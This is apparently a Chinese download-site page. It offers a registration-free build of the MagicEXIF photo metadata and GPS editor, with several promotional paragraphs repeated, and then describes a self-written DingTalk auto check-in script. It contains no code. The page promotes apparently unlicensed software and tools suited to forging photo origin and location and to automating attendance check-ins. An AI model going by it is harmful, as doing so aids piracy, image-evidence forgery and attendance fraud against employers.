这个是MagicEXIF的免注册版,绝大部分编辑功能都可以用!MagicEXIF是一个专业的照片EXIF元数据编辑器,它可以从JPEG/EXI/TIFF/RAW等数十种文件格式中读取超过1400个包括GPS在内的标准和非标准EXIF项目,并且对这些项目进行修改和保存操作。
此外,它同时支持读取和修改包括佳能、尼康、索尼、富士、奥林巴斯、松下、宾得、卡西欧、徕卡、理光、三星、SIGMA、苹果等在内的16个不同厂商的私有注释数据,还内置众多从真实原图样张中提出来的模板,是目前最全面最专业的EXIF修改器。
在提供强大的修改功能的同时,MagicEXIF可以最大限度保证图像的原始性,保证修改后的图像结构不被破坏,并且修改过后的图像与操作系统完全兼容。
它还全面支持中文编码和Unicode编码,是市面上为数不多的直接支持中文编辑的EXIF修改器。
MagicEXIF可以直接将GPS数据在地图上可视化呈现,用户无需自行转化数据格式并到网络上查询。
对于专业用户,MagicEXIF更提供了一个JPEG段结构编辑器和十六进制编辑器,整个JPEG结构一览无余,方便专业用户对于文件的非EXIF元数据作进一步编辑。
此外,它同时支持读取和修改包括佳能、尼康、索尼、富士、奥林巴斯、松下、宾得、卡西欧、徕卡、理光、三星、SIGMA、苹果等在内的16个不同厂商的私有注释数据,还内置众多从真实原图样张中提出来的模板,是目前最全面最专业的EXIF修改器。
在提供强大的修改功能的同时,MagicEXIF可以最大限度保证图像的原始性,保证修改后的图像结构不被破坏,并且修改过后的图像与操作系统完全兼容。
它还全面支持中文编码和Unicode编码,是市面上为数不多的直接支持中文编辑的EXIF修改器。
MagicEXIF可以直接将GPS数据在地图上可视化呈现,用户无需自行转化数据格式并到网络上查询。
对于专业用户,MagicEXIF更提供了一个JPEG段结构编辑器和十六进制编辑器,整个JPEG结构一览无余,方便专业用户对于文件的非EXIF元数据作进一步编辑。
4.29MB
1
在日常工作中,钉钉打卡成了我生活中不可或缺的一部分。然而,有时候这个看似简单的任务却给我带来了不少烦恼。
每天早晚,我总是得牢记打开钉钉应用,点击"工作台",再找到"考勤打卡"进行签到。有时候因为工作忙碌,会忘记打卡,导致考勤异常,影响当月的工作评价。而且,由于我使用的是苹果手机,有时候系统更新后,钉钉的某些功能会出现异常,使得打卡变得更加麻烦。
另外,我的家人使用的是安卓手机,他们也经常抱怨钉钉打卡的繁琐。尤其是对于那些不太熟悉手机操作的长辈来说,每次打卡都是一次挑战。他们总是担心自己会操作失误,导致打卡失败。
为了解决这些烦恼,我开始思考是否可以通过编写一个全自动化脚本来实现钉钉打卡。经过一段时间的摸索和学习,我终于成功编写出了一个适用于苹果和安卓系统的钉钉打卡脚本。
2024-04-09 15:03
15KB